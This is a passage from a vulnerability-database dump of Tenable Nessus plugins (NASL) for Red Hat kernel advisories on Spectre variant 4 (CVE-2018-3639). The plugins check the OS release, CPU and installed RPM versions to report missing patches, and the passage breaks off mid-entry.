script_cvs_date(\"Date: 2018/11/10 11:49:57\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_xref(name:\"RHSA\", value:\"2018:2161\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2018:2161) (Spectre)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.3\nExtended Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor's data cache even\nfor speculatively executed instructions that never actually commit\n(retire). As a result, an unprivileged attacker could use this flaw to\nread privileged memory by conducting targeted cache side-channel\nattacks. (CVE-2018-3639, x86 AMD)\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting this issue.\n\nBug Fix(es) :\n\n* When a Nonvolatile Memory Express (NVMe) namespace was created,\nchanged, or deleted, an occasional deadlock occurred. With this\nupdate, namespace scanning and removal does not hold a mutual\nexclusion (mutex) program object. As a result, a deadlock no longer\noccurs in the described scenario. (BZ#1566886)\n\n* Previously, a live migration of a virtual machine from one host with\nupdated firmware to another host without updated firmware resulted in\nincorrect kernel settings for Meltdown mitigations, which could leave\nthe kernel vulnerable to Meltdown. With this fix, the firmware on the\nnew physical host is re-scanned for updates after a live migration. As\na result, the kernel uses the correct mitigation in the described\nscenario. (BZ#1570507)\n\n* Previously, microcode updates on 32 and 64-bit AMD and Intel\narchitectures were not synchronized. As a consequence, it was not\npossible to apply the microcode updates. This fix adds the\nsynchronization to the microcode updates so that processors of the\nstated architectures receive updates at the same time. As a result,\nmicrocode updates are now synchronized. (BZ# 1578044)\n\n* When switching from the indirect branch speculation (IBRS) feature\nto the retpolines feature, the IBRS state of some CPUs was sometimes\nnot handled correctly. Consequently, some CPUs were left with the IBRS\nModel-Specific Register (MSR) bit set to 1, which could lead to\nperformance issues. With this update, the underlying source code has\nbeen fixed to clear the IBRS MSR bits correctly, thus fixing the bug.\n(BZ#1586146)\n\nUsers of kernel are advised to upgrade to these updated packages,\nwhich fix these bugs.\n\nThe system must be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:2161\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-3639\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7\\.3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.3\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:2161\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", reference:\"kernel-abi-whitelists-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", reference:\"kernel-doc-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"perf-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"python-perf-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-514.53.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-514.53.1.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:40:37", "bulletinFamily": "scanner", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639, PowerPC, x86 AMD)\n\n* kernel: Out-of-bounds access via an XFRM_MSG_MIGRATE xfrm Netlink message (CVE-2017-11600)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting CVE-2018-3639.\n\nBug Fix(es) :\n\nThese updated kernel packages include also numerous bug fixes. Space precludes documenting all of the bug fixes in this advisory. See the descriptions in the related Knowledge Article:\nhttps://access.redhat.com/articles/3485871", "modified": "2018-11-10T00:00:00", "id": "REDHAT-RHSA-2018-1965.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110708", "published": "2018-06-27T00:00:00", "title": "RHEL 7 : kernel (RHSA-2018:1965) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:1965. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110708);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/11/10 11:49:57\");\n\n script_cve_id(\"CVE-2017-11600\", \"CVE-2018-3639\");\n script_xref(name:\"RHSA\", value:\"2018:1965\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2018:1965) (Spectre)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor's data cache even\nfor speculatively executed instructions that never actually commit\n(retire). As a result, an unprivileged attacker could use this flaw to\nread privileged memory by conducting targeted cache side-channel\nattacks. (CVE-2018-3639, PowerPC, x86 AMD)\n\n* kernel: Out-of-bounds access via an XFRM_MSG_MIGRATE xfrm Netlink\nmessage (CVE-2017-11600)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting\nCVE-2018-3639.\n\nBug Fix(es) :\n\nThese updated kernel packages include also numerous bug fixes. Space\nprecludes documenting all of the bug fixes in this advisory. See the\ndescriptions in the related Knowledge Article:\nhttps://access.redhat.com/articles/3485871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/3485871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:1965\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-11600\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-3639\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:1965\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-abi-whitelists-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-doc-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-862.6.3.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-862.6.3.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:40:24", "bulletinFamily": "scanner", "description": "An update for kernel is now available for Red Hat Enterprise Linux 6.7 Extended Update Support.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639, PowerPC)\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.\n\nBug Fix(es) and Enhancement(s) :\n\nThese updated kernel packages include also numerous bug fixes and enhancements. Space precludes documenting all of the bug fixes 